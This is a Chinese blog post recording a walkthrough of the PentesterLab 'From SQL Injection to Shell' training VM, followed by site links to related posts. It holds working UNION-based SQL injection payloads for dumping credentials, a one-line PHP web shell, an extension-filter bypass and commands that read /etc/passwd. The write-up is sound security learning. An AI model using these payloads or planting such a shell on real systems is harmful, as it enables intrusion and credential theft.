[Pentester Lab]From SQL Injection to Shell

最新推荐文章于 2022-10-11 20:17:00 发布
最新推荐文章于 2022-10-11 20:17:00 发布
阅读量643 收藏
点赞数
分类专栏: Web Pentester Lab 文章标签: Web SQL注入

本文翻译了[Pentester Lab]From SQL Injection to Shell的要点,记录了笔者按照教程进行复现的过程。

By the way,庆祝一下自己拿到的第一个Web Shell(虽然是靶机233333

1. 介绍

  • 实验目的:

    • 在基于PHP的网站中使用SQL注入,以及攻击者如何使用SQL注入获取管理员界面的访问权限。然后,攻击者可以在Server上实现代码执行。

  • 攻击可以分为3个步骤:

    1. 指纹识别
    2. SQL注入的检测和利用
    3. 访问管理页面,执行代码

2. 指纹识别

使用浏览器,可以侦察到该Web应用是使用PHP实现的。

2.1 探测HTTP头

  • 可用工具
    1. telnet
    2. nc
    3. openssl
    4. burpsuite

2.2 使用dirBuster

  1. 工具:wfuzz

    命令如下:

    wfuzz -c -z file,wordlist/general/big.txt --hc 404 http://vulnerable/FUZZ
    ********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://vulnerable/FUZZ
Total requests: 3036

==================================================================

ID  Response   Lines      Word         Chars          Payload    
==================================================================


000138:  C=301      9 L       28 W      308 Ch    "admin"
000547:  C=200     92 L      141 W     1858 Ch    "cat"
000586:  C=403     10 L       30 W      286 Ch    "cgi-bin/"
000642:  C=301      9 L       28 W      310 Ch    "classes"
000761:  C=301      9 L       28 W      306 Ch    "css"
001290:  C=200     40 L       63 W      796 Ch    "header"
001362:  C=301      9 L       28 W      309 Ch    "images"
001375:  C=200     71 L      103 W     1343 Ch    "index"
002489:  C=200     70 L      108 W     1320 Ch    "show"

Total time: 3.939425
Processed Requests: 3036
Filtered Requests: 3027
Requests/sec.: 770.6706

3. SQL注入的检测和利用

3.1 检测SQL注入

3.1.1 SQL简介

  1. SQL的基本操作:增删改查。其他操作(如:创建/移除/修改表,数据库或触发器)较少用于web应用。

  2. 以SELECT为例:

    SELECT column1, column2, column3 FROM table1 WHERE column4='string1' AND column5=interger1 AND column6=interger2;

    命令由以下部分组成:(1)SELECT陈述(2)目标列(3)指定表名(4)WHERE指定条件

    SELECT * FROM tablename

    显示该表中的所有列

    • UPDATE:
    • INSERT
    • DELETE

3.1.2 基于整数的检测

  1. 检测网站注入点时,如果有错误信息回显,会方便很多。
  2. 举例,URL中提供的值被直接写入SQL查询语句,并被认为是整数。
    • 可以尝试让数据库执行基本的数学操作:

      /article.php?id=2-1
      /article.php?id=2-0
    • 各种情况以及利用方法:
      • 情况1:数据库执行了减法
      • 情况2:数据库不执行减法,那么整数的注入可能不可行。尝试字符串注入。
      • 情况3:使用单引号',应该会得到报错信息
  3. 注意,URL中的整数变量可以使用categorie.php?id=1,也可以使用categorie.php?id='1',SQL允许整数直接输入,也允许整数带单引号,作为字符串输入(比直接使用整数要慢一些)。

3.1.3 基于字符串的检测

  1. 如果网页存在SQL注入,那么注入一个单引号'会破坏查询语法,并且产生一个错误。
    • 注入两个单引号''不会破坏查询。
    • 通常来说,奇数个单引号会导致错误,而偶数个单括号则不会。
  2. 也可以使用' --将查询的后半部分给注释掉。
    • 例如下面的查询,
      SELECT id,name FROM users where name='test' and id=3;
      使用注释符号,
      SELECT id,name FROM users where name='test' --' and id=3;
      等同于
      SELECT id,name FROM users where name='test
    • 但是,如果查询采用下面的模式,使用注释依然会导致失败。
      SELECT id,name FROM users where ( name='test' and id=3 );
      可以通过加入一个或者多个括号,来找到不会犯错的值。
  3. 通常,' and '1'='1不太可能影响查询的语义,所以查询的结果和没有注入的时候很可能是一样的。作为比较,使用' and '1'='0不太可能产生错误,但是很可能改变查询的语义。
  4. 注意,SQL注入不是一门精确的科学,许多因素都可能影响测试的结果。如果发现了可能的征兆,坚持注入并尝试通过注入来搞清楚代码的逻辑,以确定这是一个SQL注入。
  5. 为了发现SQL注入点,需要访问网站,并对每一个网页上的所有参数,尝试上述的方法。一旦发现了SQL注入点,就可以接着来利用它。

3.2 SQL注入的利用

在网页http://vulnerable/cat.php找到SQL注入点之后,我们需要利用它来获取更多信息。所以,我们需要了解SQL中的UNION关键字。

3.2.1 UNION关键字

  1. UNION关键字用来把两个查询的结果放在一起。
  2. UNION可以从其他表中获取信息,因此能作为SQL注入的payload。查询的开头部分是由PHP代码生成的,所以攻击者无法修改它们。但是使用UNION,攻击者可以操纵查询的结尾,并从其他表中检索信息。
    SELECT id,name,price FROM articles WHERE id=3 UNION SELECT id,login,password FROM users
    最重要的一条规则,就是两个声明语句应该返回相同数量的列数,否则数据库会触发错误。

3.2.2 使用UNION利用SQL注入

  1. 使用UNION利用SQL注入的步骤如下:
    1. 确定列数
    2. 确定页面中显示了哪些列
    3. 从数据库元表(?)中获取信息
    4. 从其他表/数据库中获取信息
  2. 在没有源码的情况下,只能通过猜测确定第一个查询中返回的列数。可以通过以下方法:
    1. 使用UNION SELECT,并且增加列的数目
    2. 使用ORDER BY语句
  3. 使用UNION语句

如果使用UNION,并且两个查询的列数是不同的,那么数据库会抛出一个错误。

The used SELECT statements have a different 
number of columns

通过这个属性,可以猜测出列的数目。例如,对于如下查询:

SELECT id,name,price FROM articles where id=1

可以通过下面的步骤进行尝试:

SELECT id,name,price FROM articles where id=1 UNION SELECT 1
SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2
SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3

该方法适用于MySQL,其他的数据库应该把值1,2,3,...改为null,null,null,...。因为数据库对于UNION关键字需要相同的类型的值。对于Oracle,在使用SELECT时必须也使用FROM关键字,而dual表可以用来补全请求:UNION SELECT null,null,null FROM dual

  1. 使用ORDER BY语句
    ORDER BY通常用于指定数据库使用哪个列进行排序。
SELECT firstname,lastname,age,groups FROM users ORDER BY firstname

上述请求会返回用户信息,并按照firstname列进行排序。

ORDER BY可以同一个整数一起使用,使数据库按照第X列进行排序。

SELECT firstname,lastname,age,groups FROM users ORDER BY 3

上述请求会使用第3列进行排序。

这个特征可以用来检测列的数量,如果ORDER BY中的列号,大于查询中的列数,则会抛出一个错误。例如使用了列号10:

Unknown column '10' in 'order clause'

可以利用这个属性来猜测列的数目。例如,可以注入下面的查询:

SELECT id,name,price FROM articles where id=1

可以尝试下面的步骤:

SELECT id,name,price FROM articles where id=1 ORDER BY 5 -- error
SELECT id,name,price FROM articles where id=1 ORDER BY 3 -- correct
SELECT id,name,price FROM articles where id=1 ORDER BY 4 -- error

基于这种二分查找,可以确定列数为3。然后可以构建最终的查询:

SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3

二分查找在列数较大的情况下,速度可以显著加快。

3.2.3 获取信息

确定了列数之后,我们可以从数据库中获取信息。基于获取的错误信息,我们可以确定后端的数据库是MySQL。

使用这个信息,我们可以强制数据库执行一个函数,或者给我们泄露信息:

  • PHP应用使用current_user()连接到数据库
  • 数据库的版本使用version()

为了执行这两个函数,我们需要把前面语句中的一个值,替换为我们想要运行的函数,从而获取response中的结果。

注意,在获取信息时要确保列数是正确的。

可以通过下面的例子获取信息:

  • 数据库版本:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4
    数据库版本
  • the current user:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4
    当前用户
  • the current database:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4
    当前数据库名称
    目前,我们可以从数据库中获取任意信息。为了获取当前应用的信息,我们还需要得到:
  • 当前数据库的所有表名
  • 我们想要从中获取信息的表的列名

MySQL 5之后的版本,提供了包含数据库,表和列等元数据的表。我们要利用这些表,来获取我们需要的信息,从而构建最终的查询。这些表存储在数据库information_schema中。可以使用下列查询:

  • 所有表的list:SELECT table_name FROM information_schema.tables
  • 所有列的list:SELECT column_name FROM information_schema.columns

通过把这些查询混合在之前的URL中,可以猜出访问哪些网页来获取信息:
- 所有表的list:1 UNION SELCET 1,table_name,3,4 FROM information_schema.tables
- 所有列的list:1 UNION SELCE 1,column_name,3,4 FROM information_schema.columns

这些查询提供了所有表和列的原始list,但是为了查询数据库来获取感兴趣的信息,你需要知道哪些列是属于哪些表的。幸运的是,表information_schema.columns存储了这些表名:

SELCET table_name,colum_name FROM information_schema.columns

为了获取信息,我们有两种方式:

  • 将表名和列名放在注入的不同部分:
1 UNION SELCET 1,table_name,column_name,4 FROM information_schema.columns
  • 将表名和列名串联在注入的同一部分,使用关键字CONCAT
1 UNION SELCET 1,concat(table_name,':',column_name),3,4 FROM information_schema.columns

其中':'用来在查询结果中清晰地分隔两个部分。

如果想要使用正则表达式,从结果页中轻松地获取信息(比如写一个SQL注入的脚本),你可以在注入中使用一个标记:1 UNION SELECT 1,concat('^^^',table_name,':',column_name,'^^^') FROM information_schema.columns。这样就可以轻松匹配到页面的结果。
方便正则表达式的写法

目前,可以获取到一个关于表和列的list,第一个表和列是默认的MySQL表。在HTML页面的结尾,可以得到一个表的list,很可能是当前的应用使用的表。
当前的应用使用的表

通过这些信息,可以构建一个查询,来获取表中的信息:

1 UNION SELECT 1,concat(login,':',password),3,4 FROM users;

用户名和密码

SQL注入提供的权限,等于应用连接到数据库所使用的用户(current_user)权限。这就是为什么强调,在部署Web应用时要坚持“最小权限原则”。

4. 访问管理页面和代码执行

4.1 破解密码

  1. 一个没有加盐的哈希值,可以使用Google轻松破解。
    这里写图片描述
  2. 使用John-The-Ripper(http://www.openwall.com/john/)
    • 使用John破解密码,需要提供加密的算法。对于Web应用,一个合理的猜测是MD5
    • MD5算法需要使用community-enhanced版本的John

4.2 上传Webshell并执行代码

  1. 一旦获取管理员界面的访问权,下一个目标就是在OS中执行命令。

  2. 管理员界面有一个文件上传功能,允许用户上传一张图片,因此可以尝试使用该功能上传一段PHP代码。上传的PHP代码可以给我们提供一个运行PHP代码和命令的途径。

        <?php
        system($_GET['cmd']);
    ?>

  3. 发现应用禁止上传.php文件
    禁止上传.php文件

  4. 可以使用下列后缀名绕过:

    .php3
    .php.test

  5. 怎样可以获取到上传图片的存放路径?查看网页源码,可以看到<img标签指向的图片的路径。

      <div class="content">
    <h2 class="title">Last picture: Test shell</h2>

    <div class="inner" align="center">
      <p>
        <img src="admin/uploads/shell.php3" alt="Test shell" />          </p>
    </div>
 </div>
  6. 使用下面的网址,通过cmd参数来运行代码。通过uname命令可以获取当前的系统内核(Linux)。

    http://vulnerable/admin/uploads/shell.php3?cmd=uname

    • 其他命令
      • cat /etc/passwd:系统用户的完整列表

        root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
      • uname -a:当前内核的版本

        Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
      • ls:获取当前目录的内容

        cthulhu.png hacker.png ruby.jpg shell.php3
  7. webshell与运行PHP脚本的Web Server有着相同的权限,所以无法获取到/etc/shadow文件的内容,因为Web Server也没有访问该文件的权限。但是依然值得试一试,也许管理员错误地改变了这个文件的权限。
  8. 每一个命令都独立于之前的命令,运行在相同的上下文中。所以无法通过cd /etcls来获得/etc目录的内容,因为第2条命令会处于新的上下文中。为了获取目录/etc的内容,可以使用ls /etc命令。

5. 总结

  1. 本练习手工检测和利用了SQL注入,从访问管理页面。一旦进入“信任区域”,就可以使用更多的功能,从而导致更多的漏洞。
  2. 本练习基于之前对一个网站进行的渗透测试。但是如今还有许多网站有这种类型的漏洞。
  3. 本练习中提供的web server是一种理想情况:开启了错误回显,并且关闭了PHP保护选项。
    • 可以开启PHP保护选项,提高本练习的难度。方法如下:
    • 在PHP设置(/etc/php5/apache2/php.ini)中,启用magic_quotes_gpc,禁用display_errors。然后重启Web Server(/etc/init.d/apache2 restart)。
ch_fu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
From SQL Injection to Shell学习笔记
06-08
pentesterlab的From SQL Injection to Shell模块学习经验
PentesterLab-From SQL Injection to Shell: PostgreSQL edition
weixin_30731305的博客
09-18 192
一、打开页面,随便点了几下,返现和From SQL Injection to Shell差不多,直奔主题开始注入   由于PostgreSQL与MySQL不同,几个关注点需要注意下 二、order by下看看有几个字段 /cat.php?id=1%20order%20by%204 #order by 4正常,5出现报错,说明有4个字段 三、查看注入点在什么位置,...
PentesterLab-From SQL Injection to Shell
weixin_30530339的博客
09-14 194
一、打开靶机ip出现如下界面: 随便点一下,点到test链接,访问了如下url:http://192.168.109.131/cat.php?id=1,这里出现了一个id,常规思路这个位置可能有sql注入。然后看其他链接,都差不多,直到点到Admin的链接时,出来一个后台。 二、SQL注入先行 既然有id=1,首先看下这个id是字符还是数字,后面加一个 ' 号,出现了Mysql的报...
From SQL injection to shell II
cnbird's blog
06-20 1273
https://pentesterlab.com/from_sqli_to_shell_II.html
[SQL注入1]From SQL injection to Shell
weixin_30268071的博客
04-03 151
第一次写,希望大神们多指点。 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习。网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTERLAB,网址如下:http://www.pentesterlab.com/ 刚开始学,我碰到很多困难,如对数据库不够熟悉,对PHP不熟悉,对各种大神的工具不熟悉。积沙成塔,滴水穿石,我们一步一步...
vagrant-pentester:基于 Vagrant 的易受攻击的 Web 应用程序套件
06-27
现在有两种安装方法,要么下载完整的 Vagrant Pentester Base Box(首选),要么克隆存储库并让 Vagrantfile 针对 hashicorp/precise32 Base Box 运行脚本。 *** 这些应用程序应该只在本地主机环境中运行,最好...
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
Nmap-For-Pentester
05-22
Nmap for Pesterester 该备忘单是专为Red Teamers和渗透测试人员而设计的,以便帮助他们使用“ Nmap”来查找漏洞。 它的设计使初学者可以了解基础知识,而专业人士可以使用高级选项来提高自己的技能。...
Experienced-Pentester-OSEP
03-20
经验丰富的OSEP只是存储我的一些课前研究笔记的地方。...PowerShell Shellcode运行器内存中的PowerShell代表类型反射代理感知的PowerShell通信 Windows脚本宿主执行客户端代码 JScript执行 JScript基本滴管 HTA,VBA,...
freecodecamp-pentester-course
03-10
from injection shell sql to_FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION
weixin_42354108的博客
01-17 69
FROM SQL INJECTION TO SHELL:POSTGRESQL EDITION这里先介绍一下POSTGRESQL。这是一款数据库管理系统,与oracle是同类型软件。08年左右的市场占有率为8%。上图为ITPUB社区开源数据库使用状况调查探测SQL注入本关可以说是FROM SQL INJECTION TO SHELL 这关的延续。建议先通过之前的关。这关基本上和FROM SQL IN...
Pentester Lab SQL to shell
hl1293348082的专栏
04-11 300
PentesterLab提供了可用于测试和了解漏洞的易受攻击的系统。 官方地址:https://pentesterlab.com/ 渗透环境 Kali 192.168.22.128 靶机 我们去发现。(在同一内网) 正文开始 首先先介绍一款工具,个人觉得老牛逼——Netdiscover,之前我询问一哥们arp扫描工具时他推荐的。 工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求, root@kali:~# netdiscover //直接回车不带任何 自动快速发现
from injection shell sql to_CTF靶场系列-Pentester Lab: From SQL injection to Shell...
weixin_39692557的博客
01-17 265
下载地址https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_II_i386.iso实战演练使用netdiscover命令查找靶机的IP。使用nmap查看靶机开放的端口打开80端口直接用sqlmap测试显示是没有漏洞的查了资料发现需要添加这个header,X-Forwarded-For 现在尝试使用以上凭据访问管理控制台,再...
vulnhub笔记:from_sqli_to_shell
X
07-03 452
信息收集 端口扫描 # nmap -p- -sC -sV 192.168.111.141 -oA scans/allport Nmap scan report for 192.168.111.141 Host is up (0.00043s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.
pentesterlab-sql
qq_44881113的博客
11-02 307
第一关 http://192.168.1.142/sqli/example1.php?name=root 有可见传递参数,测试是否存在注入 http://192.168.1.142/sqli/example1.php?name=root’ 报错即存在注入 pyaload http://192.168.1.142/sqli/example1.php?name=root' order by 1 %23 http://192.168.1.142/sqli/example1.php?name=root%27uni
[Pentester Lab]from_sql_to_shell靶机
Re1_zf的博客
10-11 717
由此得到的这个账号密码可能就是上面那个登录页面的账号密码,而且这里sqlmap也直接给解密了密码的md5值。这个表是一个图片表,名称是一个herf,可以直接查看,后面的delete应该也是可以删除这张图片。测试一下注入点,页面的内容发生了改变,并且改编成的页面内容跟预期是一样的。首先找到一个传参的页面,记好测试前的页面的状态,然后开始测试。上传成功,检测机制不会涉及到内容,可能只是单纯的文件后缀检测。页面有些简单,但是众所周知,越简单的页面越恐怖,继续往下看。想办法上传一个可以以php格式解析的文件。
from_sqli_to_shell靶机初体验
qq_38390532的博客
07-21 1170
from_sqli_to_shell靶机的攻略
PentesterLab靶场sql注入流程
m0_37570494的博客
01-28 3785
环境安装 随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习 下载镜像的地址: https://pentesterlab.com/exercises/web_for_pentester_II/iso 正常找个虚拟机,进行iso的安装 安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/ sql注入 Example 1 万能密码: 自己尝试了几个密码,筛选出了这几个通关的,亲试可用: admin'or 1=
Pentester Lab闯关记录2(SQL Injections)
weixin_43408042的博客
10-14 471
Pentester Lab闯关记录2(SQL Injections)example1验证漏洞是否存在猜测查询返回的列数收集数据库基本信息爆破数据库 example1 验证漏洞是否存在 首先构造下面payload测试是否存在sql注入漏洞: http://192.168.202.131/sqli/example1.php?name=root’ and 1=1 --+ payload为:’ and 1=1 --+ 首先使用'闭合sql语句中的’,然后注入payload,使用--+注释掉后面的内容 发现正常返
Web For Pentester 第八关分析
最新发布
06-07
第八关的网页源代码如下: ```html <!DOCTYPE html> <html> <head> <title>Web for Pentester</title> <meta charset="UTF-8"> </head> <body> <h1 align="center">Welcome to Web for Pentester</h1> <div align="center"> <img src="8.jpg" alt="web for pentester"> </div> <div align="center"> <form method="post" action="index.php"> <input type="text" name="flag"> <input type="submit" value="Submit"> </form> </div> </body> </html> ``` 从代码中可以看出,这是一个简单的表单,让用户输入 flag 并提交表单。flag 会被提交到 index.php 页面。 我们可以尝试输入一些字符串进行测试,但是没有提示错误或者正确的信息。因此,我们需要分析 index.php 页面的代码,看看它是如何处理 flag 的。 ```php <?php if (isset($_POST['flag'])) { $flag = $_POST['flag']; if (preg_match('/^[a-zA-Z0-9]+$/', $flag)) { if (strlen($flag) < 10) { echo 'Flag is too short'; } elseif (strlen($flag) > 20) { echo 'Flag is too long'; } elseif ($flag === 'web_for_pentester') { echo 'Congratulations! You have completed the challenge'; } else { echo 'Incorrect flag'; } } else { echo 'Invalid characters found'; } } ?> ``` 从代码中可以看出,flag 必须由字母和数字组成,并且长度必须在 10 到 20 之间。如果 flag 符合要求,那么就会与 "web_for_pentester" 对比。如果匹配,就输出 "Congratulations! You have completed the challenge"。否则,输出 "Incorrect flag"。 我们可以尝试输入不同长度的字符串,例如 "abc"、"12345678901234567890" 和 "web_for_pentester",从而找到正确的 flag。 因此,第八关的 flag 是 "web_for_pentester"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值